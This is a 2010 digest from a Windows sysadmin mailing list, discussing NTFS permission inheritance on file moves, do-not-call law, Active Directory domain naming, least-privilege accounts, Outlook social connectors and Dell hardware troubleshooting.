Re: Ink & toner "cold callers"

[Ben Scott]

On Wed, Apr 28, 2010 at 4:30 PM, Jon Harris  wrote:
> THere is a national list maintained by the feds for what ever use it is.

  That's semi-independent of the do-not-call lists telemarketers are
required to maintain.  The national DNC registry is relatively new,
and has more exemptions.  Organizations have been required to maintain
their own DNC lists for decades, and *I think* only charities are
exempt.

>> You can collect penalties to the tune of something like $200 per violation.
>
> I thought the price of a mistake was much higher but hey $200 per call ...

  Okay, you made me look it up.  :)  $500 per incident.

>... if I got it would be worth the time to get their number recorded and 
>reported to
> the feds.  I wonder who gets the money sure ain't us.

  $500 is the amount of money *you* can collect.

  See: United States Code, Title 47, Chapter 5, Subchapter II, Part I,
Section 227, clause (b)(3)(B).

http://www.law.cornell.edu/uscode/47/usc_sec_47_0227000-.html#b_3

  You can also sue for damages, in much larger amounts, but that's
harder.  You have to prove the damage, i.e, that you lost money.  For
the above, you just have to prove the violation.

-- Ben

~ Finally, powerful endpoint security that ISN'T a resource hog! ~
~   ~

RE: The finer points of NTFS ACLs (was: Software installs on new PCs)

[Ralph Smith]

Sorry, I was just skimming through the messages and missed that.  Should have 
checked first. 

-Original Message-
From: Ben Scott [mailto:mailvor...@gmail.com] 
Sent: Wednesday, April 28, 2010 11:18 PM
To: NT System Admin Issues
Subject: Re: The finer points of NTFS ACLs (was: Software installs on new PCs)

On Wed, Apr 28, 2010 at 11:11 PM, Ralph Smith  
wrote:
> Does this address your issue?  This is from From Article ID: 310316:

  Try about four messages back in the thread.  ;-)

  Thanks anyway.  :)

-- Ben

~ Finally, powerful endpoint security that ISN'T a resource hog! ~ ~ 
  ~

Confidentiality Notice: 

--



This communication, including any attachments, may contain confidential 
information and is intended only for the individual or entity to whom it is 
addressed. Any review, dissemination, or copying of this communication by 
anyone other than the intended recipient is strictly prohibited. If you are not 
the intended recipient, please contact the sender by reply email, delete and 
destroy all copies of the original message.

~ Finally, powerful endpoint security that ISN'T a resource hog! ~
~   ~

RE: The finer points of NTFS ACLs (was: Software installs on new PCs)

[Ralph Smith]

I also saw this on WinITPro
(http://www.windowsitpro.com/article/permissions/ntfs-inheritance-rule-c
hange.aspx) which is interesting.  One of the commenters states that it
is only changed when using the GUI, however.


Until recently, NTFS permissions have followed these inheritance rules:

   1. If a file or folder is copied to some other location, it will
inherit the new location's NTFS permissions.
   2. If a file or folder is moved to some other location on a different
disk drive, it will inherit the new location's NTFS permissions.
   3. If a file or folder is moved to some other location on the same
disk drive, it will retain the original location's NTFS permissions.

One of the NTFS inheritance rules changed in Windows 7, Windows Server
2008, and Windows Vista. Now if you move a file or folder, it will
inherit the new location's NTFS permissions, even if the new location is
on the same disk drive. This is a radical shift that you need to take
into account when you're moving files. You can find a reference to this
change in the Notes section in the Microsoft article "Inherited
permissions are not automatically updated when you move folders". 



-Original Message-
From: Ben Scott [mailto:mailvor...@gmail.com] 
Sent: Wednesday, April 28, 2010 10:31 PM
To: NT System Admin Issues
Subject: Re: The finer points of NTFS ACLs (was: Software installs on
new PCs)

On Wed, Apr 28, 2010 at 5:35 PM, James Rankin 
wrote:
> I didn't know that you were asking users to actually perform the 
> moveone of the benefits of us being a fairly small and linear 
> organisation is that stuff doesn't tend to get moved from drive to
drive too often.

  If it gets moved from "drive" to "drive", Windows actually implicitly
does a copy-then-delete, so that's fine.  It's moving between folders on
the same "drive" that causes the problem.

  For example, say we've got a folder like this, for our official
Quality Management System documentation:

N:\Quality\QMSDocs\

  Under there, we have sub-folders:

N:\Quality\QMSDocs\Drafts\
N:\Quality\QMSDocs\Current\
N:\Quality\QMSDocs\Obsolete\

  Everyone in the company can read "Current", but only members of the
"Quality Staff" group can read "Drafts" or "Current".  When a draft is
approved, the doc editor moves the file from "Drafts" to "Current".

  Problem is, Windows does not update the ACL on the file.  So nobody in
the rest of the company can open the file.  The doc editor has to
explicitly do a copy-then-delete.  Giant pain in the butt.

  I imagine this could be a security exposure, too.  If you've got
Bypass Traverse Checking turned on (which is the default), you can open
a file as long as you know its name.  So, hypothetically, some
unsuspecting user could move a file from a internal-public folder to a
nominally restricted folder.  But Windows would keep the old ACL.
Someone could guess the new location and still read/modify the file.
This is a fairly unlikely scenario, I think, but when it comes to
security, unlikely scenarios have a disturbing tendency to pay off.

  All Microsoft would need to do to fix this would be to make the "move"
system call check the ACL of the item being moved, remove any inherited
ACEs, and if it isn't set to block inheritance, propagate ACEs from the
new container.  If you're worried about unneeded write I/O, have it only
write the new ACL if it differs from the old ACL.
Make it a non-default option if you're concerned about performance or
backwards compatibility or whatever.

-- Ben

~ Finally, powerful endpoint security that ISN'T a resource hog! ~ ~
  ~
Confidentiality Notice: 

--



This communication, including any attachments, may contain confidential 
information and is intended only for the individual or entity to whom it is 
addressed. Any review, dissemination, or copying of this communication by 
anyone other than the intended recipient is strictly prohibited. If you are not 
the intended recipient, please contact the sender by reply email, delete and 
destroy all copies of the original message.

~ Finally, powerful endpoint security that ISN'T a resource hog! ~
~   ~

Re: The finer points of NTFS ACLs (was: Software installs on new PCs)

[Ben Scott]

On Wed, Apr 28, 2010 at 11:11 PM, Ralph Smith  
wrote:
> Does this address your issue?  This is from From Article ID: 310316:

  Try about four messages back in the thread.  ;-)

  Thanks anyway.  :)

-- Ben

~ Finally, powerful endpoint security that ISN'T a resource hog! ~
~   ~

Re: Current AD domain naming best practices

[Ben Scott]

On Wed, Apr 28, 2010 at 4:48 PM, Michael B. Smith  wrote:
> You won't get that for .int or .local.

  .int?  I take it some people are using that for "internal"?  Heh.  I
guess people have forgotten  is a "real" top-level domain name.
It is used for international organizations.  Try http://www.nato.int/
to see it in action.

  This is why I recommend using a registered domain name, owned by the
organization, for all but the smallest of networks.  Better to avoid
the possibility of a name collision, even if it is remote.  You can
use a subdomain (corp.example.com) or a separate 2LD (example.com and
example.net), but follow DNS specifications and best practices.

  Of course, then you have the problem of corporate divestitures...

-- Ben

~ Finally, powerful endpoint security that ISN'T a resource hog! ~
~   ~

RE: The finer points of NTFS ACLs (was: Software installs on new PCs)

[Ralph Smith]

Does this address your issue?  This is from From Article ID: 310316:

"How permissions are handled when you copy and move files and folders"

I haven't tried it myself.



"You can modify how Windows Explorer handles permissions when objects
are moved in the same NTFS volume. As mentioned, when an object is moved
within the same volume, the object preserves its permissions by default.
However, if you want to modify this behavior so that the object inherits
the permissions from the parent folder, modify the registry as follows:

   1. Click Start, click Run, type regedit, and then press ENTER.
   2. Locate and then click the following registry subkey:
 
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer
   3. On the Edit menu, click Add Value, and then add the following
registry value:

  Value name: MoveSecurityAttributes
  Data type: DWORD
  Value data: 0
   4. Exit Registry Editor.
   5. Make sure that the user account that is used to move the object
has the Change Permissions permission set. If the permission is not set,
grant the Change Permissions permission to the user account.

Note The MoveSecurityAttributes registry value only applies to Windows
XP and to Windows Server 2003. The value does not affect Windows 2000."







-Original Message-
From: Ben Scott [mailto:mailvor...@gmail.com] 
Sent: Wednesday, April 28, 2010 10:31 PM
To: NT System Admin Issues
Subject: Re: The finer points of NTFS ACLs (was: Software installs on
new PCs)

On Wed, Apr 28, 2010 at 5:35 PM, James Rankin 
wrote:
> I didn't know that you were asking users to actually perform the 
> moveone of the benefits of us being a fairly small and linear 
> organisation is that stuff doesn't tend to get moved from drive to
drive too often.

  If it gets moved from "drive" to "drive", Windows actually implicitly
does a copy-then-delete, so that's fine.  It's moving between folders on
the same "drive" that causes the problem.

  For example, say we've got a folder like this, for our official
Quality Management System documentation:

N:\Quality\QMSDocs\

  Under there, we have sub-folders:

N:\Quality\QMSDocs\Drafts\
N:\Quality\QMSDocs\Current\
N:\Quality\QMSDocs\Obsolete\

  Everyone in the company can read "Current", but only members of the
"Quality Staff" group can read "Drafts" or "Current".  When a draft is
approved, the doc editor moves the file from "Drafts" to "Current".

  Problem is, Windows does not update the ACL on the file.  So nobody in
the rest of the company can open the file.  The doc editor has to
explicitly do a copy-then-delete.  Giant pain in the butt.

  I imagine this could be a security exposure, too.  If you've got
Bypass Traverse Checking turned on (which is the default), you can open
a file as long as you know its name.  So, hypothetically, some
unsuspecting user could move a file from a internal-public folder to a
nominally restricted folder.  But Windows would keep the old ACL.
Someone could guess the new location and still read/modify the file.
This is a fairly unlikely scenario, I think, but when it comes to
security, unlikely scenarios have a disturbing tendency to pay off.

  All Microsoft would need to do to fix this would be to make the "move"
system call check the ACL of the item being moved, remove any inherited
ACEs, and if it isn't set to block inheritance, propagate ACEs from the
new container.  If you're worried about unneeded write I/O, have it only
write the new ACL if it differs from the old ACL.
Make it a non-default option if you're concerned about performance or
backwards compatibility or whatever.

-- Ben

~ Finally, powerful endpoint security that ISN'T a resource hog! ~ ~
  ~
Confidentiality Notice: 

--



This communication, including any attachments, may contain confidential 
information and is intended only for the individual or entity to whom it is 
addressed. Any review, dissemination, or copying of this communication by 
anyone other than the intended recipient is strictly prohibited. If you are not 
the intended recipient, please contact the sender by reply email, delete and 
destroy all copies of the original message.

~ Finally, powerful endpoint security that ISN'T a resource hog! ~
~   ~

Re: Admin rights, UAC, etc. (was: WTF? Fake AV)

[Ben Scott]

On Wed, Apr 28, 2010 at 4:55 PM, Ziots, Edward  wrote:
> Define “Properly Secured” because what is secured from one users prospective
> is totally different than what another user thinks ...

  "Properly secured" would mean the accounts used for day-to-day
operations do not have permission to modify the system.  Principle of
least privilege.  A well-known and widely-recommended best practice
since roughly the 1960s.  As I went on to detail in my message.

> ... no ... computer for that matter can be 100% protected.

  I never claimed otherwise.  I wrote "properly secured", not
"perfectly secured".

  Did reading comprehension just drop sharply or something?  What is
it about this topic that makes people unable to follow a line of
reasoning?  It's like attack of the strawmen.  What next, "Macs are
more secure because Chewbacca is a Wookie"?

-- Ben

~ Finally, powerful endpoint security that ISN'T a resource hog! ~
~   ~

RE: Outlook 2010 - Social Connectors

[Ben Schorr]

I can't speak to the Facebook connector, as I haven't seen it yet, but
the LinkedIn connector does NOT send any info to LinkedIn about mail you
send/receive.  In fact what it does is download your LinkedIn contacts
list to a special Outlook Contacts folder.  All of the profile
synchronization/updating happens there.

 

Ben M. Schorr
Chief Executive Officer
__
Roland Schorr & Tower
www.rolandschorr.com  
b...@rolandschorr.com

 

 

From: James Hill [mailto:james.h...@superamart.com.au] 
Sent: Wednesday, April 28, 2010 4:04 PM
To: NT System Admin Issues
Subject: Outlook 2010 - Social Connectors

 

We are currently piloting Outlook 2010 and I'm interested in everyone's
thoughts on the Social Connectors.

 

Whilst not all of the connectors
  are available yet it won't be long
before they are.

 

What is interesting to me is that it opens up a much larger social/work
interconnect then we had before.  Whilst we allow staff to use Social
Networking apps like Facebook we also limit the amount of use to an hour
per day(so they can spend their whole lunch break on there if they
wish).  But with integration into business apps, Outlook, the potential
for interruption will be huge.

 

I'm also curious about the security implications:- 

 

* These programs may send the e-mail addresses from e-mail you send and
receive to third-party social networks. The social networks may use the
e-mail addresses to provide you activity feeds.

 

What's to stop this info being spread to other Facebook apps?  Farmtown
invites will be going to the CEO from their assistants friends in no
time J

 

Many businesses have a strict policy on social networking which results
in zero access.  We haven't taken that approach here as some research
suggests there MAY be benefits to allowing it.

 

Interesting times ahead.

 

 

 

~ Finally, powerful endpoint security that ISN'T a resource hog! ~
~   ~

Re: Admin rights, UAC, etc. (was: WTF? Fake AV)

[Ben Scott]

On Wed, Apr 28, 2010 at 4:46 PM, Jon Harris  wrote:
>> " With the exception of exploitation of unpatched vulnerabilities,
>> I've never seen malware lead to a system compromise on a
>> properly-secured Win XP machine"
>
> Sorry but how many (l)users know how to this?

  None.  I never claimed otherwise.  The statement I was responding to
was, "Even with users not in admin group in Windows XP, Vista I have
seen malware get right on and hose a machine."

> You can teach people not to click Okay or Yes ...

  Heh.  Maybe *you* can.  When it comes to lusers, I haven't had much
luck with that.  Especially for children or teenagers.  But then, I've
been working mainly in corporate IT for a number of years now.  Maybe
if it's a home luser who pays by the hour for fixing it's a different
story.

  http://www.bynkii.com/archives/2009/01/for_new_sysadminsit_types.html

-- Ben

~ Finally, powerful endpoint security that ISN'T a resource hog! ~
~   ~

Re: Outlook 2K3 as non admin (was RE: WTF? Fake AV)

[Ben Scott]

On Wed, Apr 28, 2010 at 5:17 PM, Jon Harris  wrote:
> I used to run Office 2000 pro as none admin without issues.

  Office 2000 couldn't edit images correctly without admin rights,
unless you manually granted permissions on a registry branch under
HKLM.  There was also some other stupid thing like that that I've
forgotten the details on.  I don't think I ever hit a problem with
Outlook, though.

  (The interesting part is that the Win 2000 Logo program required the
ability to run without admin rights, and Office 2000 carried the Win
2000 Logo.  Microsoft's official response was basically "Well, most of
it is compliant.")

-- Ben

~ Finally, powerful endpoint security that ISN'T a resource hog! ~
~   ~

Re: The finer points of NTFS ACLs (was: Software installs on new PCs)

[Ben Scott]

On Wed, Apr 28, 2010 at 5:35 PM, James Rankin  wrote:
> I didn't know that you were asking users to actually perform the moveone
> of the benefits of us being a fairly small and linear organisation is that
> stuff doesn't tend to get moved from drive to drive too often.

  If it gets moved from "drive" to "drive", Windows actually
implicitly does a copy-then-delete, so that's fine.  It's moving
between folders on the same "drive" that causes the problem.

  For example, say we've got a folder like this, for our official
Quality Management System documentation:

N:\Quality\QMSDocs\

  Under there, we have sub-folders:

N:\Quality\QMSDocs\Drafts\
N:\Quality\QMSDocs\Current\
N:\Quality\QMSDocs\Obsolete\

  Everyone in the company can read "Current", but only members of the
"Quality Staff" group can read "Drafts" or "Current".  When a draft is
approved, the doc editor moves the file from "Drafts" to "Current".

  Problem is, Windows does not update the ACL on the file.  So nobody
in the rest of the company can open the file.  The doc editor has to
explicitly do a copy-then-delete.  Giant pain in the butt.

  I imagine this could be a security exposure, too.  If you've got
Bypass Traverse Checking turned on (which is the default), you can
open a file as long as you know its name.  So, hypothetically, some
unsuspecting user could move a file from a internal-public folder to a
nominally restricted folder.  But Windows would keep the old ACL.
Someone could guess the new location and still read/modify the file.
This is a fairly unlikely scenario, I think, but when it comes to
security, unlikely scenarios have a disturbing tendency to pay off.

  All Microsoft would need to do to fix this would be to make the
"move" system call check the ACL of the item being moved, remove any
inherited ACEs, and if it isn't set to block inheritance, propagate
ACEs from the new container.  If you're worried about unneeded write
I/O, have it only write the new ACL if it differs from the old ACL.
Make it a non-default option if you're concerned about performance or
backwards compatibility or whatever.

-- Ben

~ Finally, powerful endpoint security that ISN'T a resource hog! ~
~   ~

Outlook 2010 - Social Connectors

[James Hill]

We are currently piloting Outlook 2010 and I'm interested in everyone's 
thoughts on the Social Connectors.

Whilst not all of the 
connectors
 are available yet it won't be long before they are.

What is interesting to me is that it opens up a much larger social/work 
interconnect then we had before.  Whilst we allow staff to use Social 
Networking apps like Facebook we also limit the amount of use to an hour per 
day(so they can spend their whole lunch break on there if they wish).  But with 
integration into business apps, Outlook, the potential for interruption will be 
huge.

I'm also curious about the security implications:-

* These programs may send the e-mail addresses from e-mail you send and receive 
to third-party social networks. The social networks may use the e-mail 
addresses to provide you activity feeds.

What's to stop this info being spread to other Facebook apps?  Farmtown invites 
will be going to the CEO from their assistants friends in no time :)

Many businesses have a strict policy on social networking which results in zero 
access.  We haven't taken that approach here as some research suggests there 
MAY be benefits to allowing it.

Interesting times ahead.


~ Finally, powerful endpoint security that ISN'T a resource hog! ~
~   ~

Re: Webster is now employed

[Sean Houston]

Congrats Webster!  Good luck at LPS.

-Sean
On Wed, Apr 28, 2010 at 6:19 PM, Malcolm Reitz wrote:

>  Excellent – congrats! Post a pic of you in your “green beret” :-)
>
>
>
> -Malcolm
>
>
>
> *From:* Webster [mailto:webs...@carlwebster.com]
> *Sent:* Tuesday, April 27, 2010 21:06
>
> *To:* NT System Admin Issues
> *Subject:* Webster is now employed
>
>
>
> *Webster is now employed by LPS Integration in Nashville, TN as Sr. Citrix
> Technical Architect.  I start Friday May 7th.
> http://www.lpsintegration.com/*
>
>
>
>
>
> Carl Webster
>
> Citrix Technology Professional
>
> http://dabcc.com/Webster
>
>
>
>
>
>
>
>
>
>
>
>


-- 
Sean Houston
216-798-4476
IT Specialist
CompTIA A+, Security+, Network+, Server+

~ Finally, powerful endpoint security that ISN'T a resource hog! ~
~   ~

RE: Webster is now employed

[Malcolm Reitz]

Excellent - congrats! Post a pic of you in your "green beret" :-)

 

-Malcolm

 

From: Webster [mailto:webs...@carlwebster.com] 
Sent: Tuesday, April 27, 2010 21:06
To: NT System Admin Issues
Subject: Webster is now employed

 

Webster is now employed by LPS Integration in Nashville, TN as Sr. Citrix
Technical Architect.  I start Friday May 7th. http://www.lpsintegration.com/

 

 

Carl Webster

Citrix Technology Professional

http://dabcc.com/Webster

 

 

 

~ Finally, powerful endpoint security that ISN'T a resource hog! ~
~   ~

RE: Dell Docking Station mystery

[Charlie Kaiser]

Don't know about that model but I remember seeing this on the old Latitudes.
Bent pins in the dock connectors. I was able to gently straighten most of
them...
Seems the first thing to fail was always connectivity...

***
Charlie Kaiser
charl...@golden-eagle.org
Kingman, AZ
***  

> -Original Message-
> From: Bill Lambert [mailto:blamb...@concuity.com] 
> Sent: Wednesday, April 28, 2010 3:19 PM
> To: NT System Admin Issues
> Subject: Dell Docking Station mystery
> 
> I have a weird issue with a D530.  The user docks her laptop 
> into a Dell D Port every day and today she undocked it to go 
> wireless at a meeting.  When she came back and docked, the 
> wirless connection was working but when she tried to enable 
> her wired nic, she gets 'connection failed'.  Tried different 
> dports and same results. Everything works great when 
> undocked.  Has anyone seen this and know a solution?
> 
>  
> 
> Thanks!
> 
>  
> 
> Bill Lambert
> 
> Windows System Administrator
> 
> Concuity
> 
> Phone  847-941-9206
> 
> Fax  847-465-9147
> 
> ConcuityLogoSmall3-29-10
> 
>  
> 
>  
> 
> The information contained in this e-mail message, including 
> any attached files, is intended only for the personal and 
> confidential use of the recipient(s) named above. If you are 
> not the intended recipient (or authorized to receive 
> information for the recipient) you are hereby notified that 
> you have received this communication in error and that any 
> review, dissemination, distribution, or copying of this 
> message is strictly prohibited. If you have received this 
> communication in error, please contact the sender by reply 
> email and delete all copies of this message.  Thank you.
> 
>  
> 
>  
> 
>  
> 
> 


~ Finally, powerful endpoint security that ISN'T a resource hog! ~
~   ~

Re: Dell MD1000

[Ben N]

We have about 6 of them total here. They are pretty good for the money. They
have two places in which to plug in the external SAS cable. We have the Perc
6/E cards for the servers that have these attached. Fits 15 drives. We have
some configs where two servers share the same MD1000 too. There is a switch
you use to split it. so one MD1000 controller has 7 drives and the other
controller has 8 drives. This is static, you don't get the pick the drives
or how many. We have a few that are all 750GB SATA and some that are all
300GB SAS.

-Ben

On Wed, Apr 28, 2010 at 3:05 PM, Richard Stovall  wrote:

> The MD3000, while much more flexible, is out of the price range for this
> project.  I was thinking of a server with a Perc 6/E attached to the MD1000.
>  So I guess I'm asking about the combination of Perc 6/E + MD1000.
>
>
> On Wed, Apr 28, 2010 at 3:46 PM, Anders Blomgren wrote:
>
>> The MD1000 is just a SAS enclosure without any controller at all. Are you
>> asking about the MD3000 or the Perc6 raid card that actually drives an
>> MD1000?
>>
>> -Anders
>>
>> On Wed, Apr 28, 2010 at 9:33 PM, Richard Stovall wrote:
>>
>>> Anyone have one (or more) of the Dell MD1000s?  Any comments, good or
>>> ill?
>>>
>>> I'm thinking about creating a new file server and this is a relatively
>>> inexpensive option from a big vendor.
>>>
>>> Thanks,
>>> RS
>>>
>>>
>>>
>>>
>>>
>>>
>>
>>
>>
>>
>>
>
>
>
>
>

~ Finally, powerful endpoint security that ISN'T a resource hog! ~
~   ~

RE: Dell Docking Station mystery

[John Cook]

No specific experiences but I would update the BIOS as a first item.

John W. Cook
Systems Administrator
Partnership For Strong Families
315 SE 2nd Ave
Gainesville, Fl 32601
Office (352) 393-2741 x320
Cell (352) 215-6944
Fax (352) 393-2746
MCSE, MCTS, MCP+I, A+, N+, VSP4, VTSP4

From: Bill Lambert [mailto:blamb...@concuity.com]
Sent: Wednesday, April 28, 2010 6:19 PM
To: NT System Admin Issues
Subject: Dell Docking Station mystery

I have a weird issue with a D530.  The user docks her laptop into a Dell D Port 
every day and today she undocked it to go wireless at a meeting.  When she came 
back and docked, the wirless connection was working but when she tried to 
enable her wired nic, she gets 'connection failed'.  Tried different dports and 
same results. Everything works great when undocked.  Has anyone seen this and 
know a solution?

Thanks!

Bill Lambert
Windows System Administrator
Concuity
Phone  847-941-9206
Fax  847-465-9147
[cid:image001.png@01CAE6FF.C0EC96E0]


The information contained in this e-mail message, including any attached files, 
is intended only for the personal and confidential use of the recipient(s) 
named above. If you are not the intended recipient (or authorized to receive 
information for the recipient) you are hereby notified that you have received 
this communication in error and that any review, dissemination, distribution, 
or copying of this message is strictly prohibited. If you have received this 
communication in error, please contact the sender by reply email and delete all 
copies of this message.  Thank you.







CONFIDENTIALITY STATEMENT: The information transmitted, or contained or 
attached to or with this Notice is intended only for the person or entity to 
which it is addressed and may contain Protected Health Information (PHI), 
confidential and/or privileged material. Any review, transmission, 
dissemination, or other use of, and taking any action in reliance upon this 
information by persons or entities other than the intended recipient without 
the express written consent of the sender are prohibited. This information may 
be protected by the Health Insurance Portability and Accountability Act of 1996 
(HIPAA), and other Federal and Florida laws. Improper or unauthorized use or 
disclosure of this information could result in civil and/or criminal penalties.
Consider the environment. Please don't print this e-mail unless you really need 
to.

This email and any attached files are confidential and intended solely for the 
intended recipient(s). If you are not the named recipient you should not read, 
distribute, copy or alter this email. Any views or opinions expressed in this 
email are those of the author and do not represent those of the company. 
Warning: Although precautions have been taken to make sure no viruses are 
present in this email, the company cannot accept responsibility for any loss or 
damage that arise from the use of this email or attachments.

~ Finally, powerful endpoint security that ISN'T a resource hog! ~
~   ~<>

Dell Docking Station mystery

[Bill Lambert]

I have a weird issue with a D530.  The user docks her laptop into a Dell
D Port every day and today she undocked it to go wireless at a meeting.
When she came back and docked, the wirless connection was working but
when she tried to enable her wired nic, she gets 'connection failed'.
Tried different dports and same results. Everything works great when
undocked.  Has anyone seen this and know a solution?

 

Thanks!

 

Bill Lambert

Windows System Administrator

Concuity

Phone  847-941-9206

Fax  847-465-9147

 

 

 

The information contained in this e-mail message, including any attached
files, is intended only for the personal and confidential use of the
recipient(s) named above. If you are not the intended recipient (or
authorized to receive information for the recipient) you are hereby
notified that you have received this communication in error and that any
review, dissemination, distribution, or copying of this message is
strictly prohibited. If you have received this communication in error,
please contact the sender by reply email and delete all copies of this
message.  Thank you.

 


~ Finally, powerful endpoint security that ISN'T a resource hog! ~
~   ~<>

Re: Dell MD1000

[Richard Stovall]

The MD3000, while much more flexible, is out of the price range for this
project.  I was thinking of a server with a Perc 6/E attached to the MD1000.
 So I guess I'm asking about the combination of Perc 6/E + MD1000.

On Wed, Apr 28, 2010 at 3:46 PM, Anders Blomgren wrote:

> The MD1000 is just a SAS enclosure without any controller at all. Are you
> asking about the MD3000 or the Perc6 raid card that actually drives an
> MD1000?
>
> -Anders
>
> On Wed, Apr 28, 2010 at 9:33 PM, Richard Stovall wrote:
>
>> Anyone have one (or more) of the Dell MD1000s?  Any comments, good or ill?
>>
>>
>> I'm thinking about creating a new file server and this is a relatively
>> inexpensive option from a big vendor.
>>
>> Thanks,
>> RS
>>
>>
>>
>>
>>
>>
>
>
>
>
>

~ Finally, powerful endpoint security that ISN'T a resource hog! ~
~   ~

Re: Outlook 2K3 as non admin (was RE: WTF? Fake AV)

[Steven Peck]

Here as well.  NT3.51, 4, 2k, etc.

On Wed, Apr 28, 2010 at 2:17 PM, Jon Harris  wrote:
> I used to run Office 2000 pro as none admin without issues.
>
> Jon
>
> On Wed, Apr 28, 2010 at 3:51 PM, Ben Scott  wrote:
>>
>> On Wed, Apr 28, 2010 at 1:19 PM, David Lum  wrote:
>> > ... I have Outlook 2003 working for non-admins and have for some years
>> > now.
>>
>>  Same here.  We've been running Outlook 2003 without admin rights
>> since it was released.  Come to think of it, I'm not sure I've *ever*
>> run Outlook 2003 as an admin, even for installation.
>>
>> -- Ben
>>
>> ~ Finally, powerful endpoint security that ISN'T a resource hog! ~
>> ~   ~
>
>
>
>

~ Finally, powerful endpoint security that ISN'T a resource hog! ~
~   ~

Re: The finer points of NTFS ACLs (was: Software installs on new PCs)

[James Rankin]

I didn't know that you were asking users to actually perform the moveone
of the benefits of us being a fairly small and linear organisation is that
stuff doesn't tend to get moved from drive to drive too often.

On 28 April 2010 21:04, Ben Scott  wrote:

> On Wed, Apr 28, 2010 at 12:55 PM, James Rankin 
> wrote:
> > I don't know whether removing Creator Owner from the ACL actually updates
> or
> > changes the owner in any way.
>
>   It doesn't change the owner, but that doesn't matter.  "CREATOR
> OWNER" is a magic ACE that turns into whatever the owner is/was set to
> when the ACL is applied.  Simply remove the "CREATOR OWNER" ACE and
> avoid the problem entirely.
>
>  Why are you using "CREATOR OWNER" in an ACL in the first place?  I
> think that's your problem.
>
> > For preserving (or not) permissions on file moves, I find robocopy is the
> > way forward ...
>
>  Two problems with that: (1) Requires permission to set the ACL.  (2)
> Asking your typical user to use ROBOCOPY to move files is ridiculous.
>
> -- Ben
>
> ~ Finally, powerful endpoint security that ISN'T a resource hog! ~
> ~   ~
>



-- 
"On two occasions...I have been asked, 'Pray, Mr Babbage, if you put into
the machine wrong figures, will the right answers come out?' I am not able
rightly to apprehend the kind of confusion of ideas that could provoke such
a question."

~ Finally, powerful endpoint security that ISN'T a resource hog! ~
~   ~

Re: The finer points of NTFS ACLs (was: Software installs on new PCs)

[Jon Harris]

I read a Technet article written by the Scripting Guys and did just this for
PS.  They even recommended that it be run periodically just to keep some
help desk type or sort of knowledgeable user from messing up the perms.
They did offer some suggestions as to how often but they did not have a hard
or fast rule on the rerun.

Jon

On Wed, Apr 28, 2010 at 3:15 PM, Andrew S. Baker  wrote:

> Copy the files to the new location. Or, reapply the perms by script
>
> -ASB: http://XeeSM.com/AndrewBaker 
>
> Sent from my Motorola Droid
>
> On Apr 28, 2010 12:45 PM, "Ben Scott"  wrote:
>
> On Wed, Apr 28, 2010 at 11:54 AM, James Rankin 
> wrote:
> > We see this problem where people create folders under shared drives, that
> > each new folder is owned by the creating user who then has the added
> rights.
> > The solution is some weekly subinacl tasks that re-take ownership of the
> > whole fileserver structure back to BUILTIN\Administrators
>
>  Wouldn't it be better to just remove "CREATOR OWNER" from the ACL on
> the folder?
>
>  All our shared folders are set so only the group(s) which should
> have permission are present.
>
>  The only good use for "CREATOR OWNER" I've found is kludging around
> apps that insist on writing to their own program directory.  So grant
> users "Create File" on "This folder only", and separately grant
> "CREATOR OWNER" "Modify" on "Files only".  Now users can create the
> file, but can't touch anything else.
>
>  My biggest beef is that if you move an object within a "drive" on
> Windows, Windows does not update the ACL on the object to reflect
> different permissions in its new location.  So, for example, when a
> file is moved from the QA-only pre-release folder to the whole-company
> general-release folder, the file still has permissions for pre-release
> and nobody else can read it.  Anyone got a fix for *that*?
>
> -- Ben
>
> ~ Finally, powerful endpoint security that ISN'T a resource hog! ~
> ~   ~
>
>
>
>
>
>

~ Finally, powerful endpoint security that ISN'T a resource hog! ~
~   ~

Re: Outlook 2K3 as non admin (was RE: WTF? Fake AV)

[Jon Harris]

I used to run Office 2000 pro as none admin without issues.

Jon

On Wed, Apr 28, 2010 at 3:51 PM, Ben Scott  wrote:

> On Wed, Apr 28, 2010 at 1:19 PM, David Lum  wrote:
> > ... I have Outlook 2003 working for non-admins and have for some years
> now.
>
>  Same here.  We've been running Outlook 2003 without admin rights
> since it was released.  Come to think of it, I'm not sure I've *ever*
> run Outlook 2003 as an admin, even for installation.
>
> -- Ben
>
> ~ Finally, powerful endpoint security that ISN'T a resource hog! ~
> ~   ~
>

~ Finally, powerful endpoint security that ISN'T a resource hog! ~
~   ~

Re: WTF? Fake AV

[Jon Harris]

A small target vs a HUGE target?  Keep in mind the virus writers are or
could be a lazy as the Application developers.  If you have been writing
Windows viruses for years you tend to continue doing so until the target is
of little value.  If you are a developer you don't generally develop for 2
platforms only one and when you are a master at one you don't generally go
work on another until forced to.

That is human nature at work!

Jon

On Wed, Apr 28, 2010 at 4:33 PM, Mayo, Bill  wrote:

> Not sure what point you are disputing but 115 (total) versus 70,000 per day
> (your numbers from earlier today) is kind of lopsided.  I'm not saying that
> 115 isn't enough to worry about, but if 115 in 8 years is "growing fast",
> what in the world do you call 70,000 per day?!?!
>
> -Original Message-
> From: Stu Sjouwerman [mailto:s...@sunbelt-software.com]
> Sent: Wednesday, April 28, 2010 4:17 PM
> To: NT System Admin Issues
> Subject: RE: WTF? Fake AV
>
> Erm, There are 115 known strains (and growing fast) of malware for the Mac.
> That's why we are releasing a VIPRE client for the Mac in Q2. They have sold
> enough machines to make it attractive for cyber crime to go after. All
> security models will break as per the principle of the 'bigger hammer'.
>
> Warm regards,
>
>
> Stu Sjouwerman
> Co-Founder, Publisher, Sunbelt Media
> P: +1-727-562-0101 ext 218
> F: +1-727-562-5199
> s...@sunbelt-software.com
>
>
>
>
>
> -Original Message-
> From: Steven M. Caesare [mailto:scaes...@caesare.com]
> Sent: Wednesday, April 28, 2010 4:10 PM
> To: NT System Admin Issues
> Subject: RE: WTF? Fake AV
>
> And you are making the (rather dramatic, IMO) over generalization that
> Microsoft simply tells app vendors what to do and expects them to move at
> the drop of a hat.
>
> The reality is that MS has typically bent over backwards to ensure
> backwards compatibility (to a fault you may argue) for applications wherever
> possible. That has been one of the tenets of their OS design since Windows
> had DOS boxes.
>
>  They have compatibility flags within the OS to special case specific apps
> and installers. They has wow32 and wow64. They did FX!32 on Alpha.
> They've supported old versions of API's along with new versions. They allow
> unsigned hardware even though the new model requires signed hardware. Etc,
> etc...
>
> Heck, up until Vista you could still run something from 20 yr old DOS..
>
> Now would they LIKE apps vendors to comply with new direction day1? Yes.
> Do they all? No. So there is much notification, suggestion, development
> guidelines, DevCons, etc... to shepherd app vendors the right direction.
>
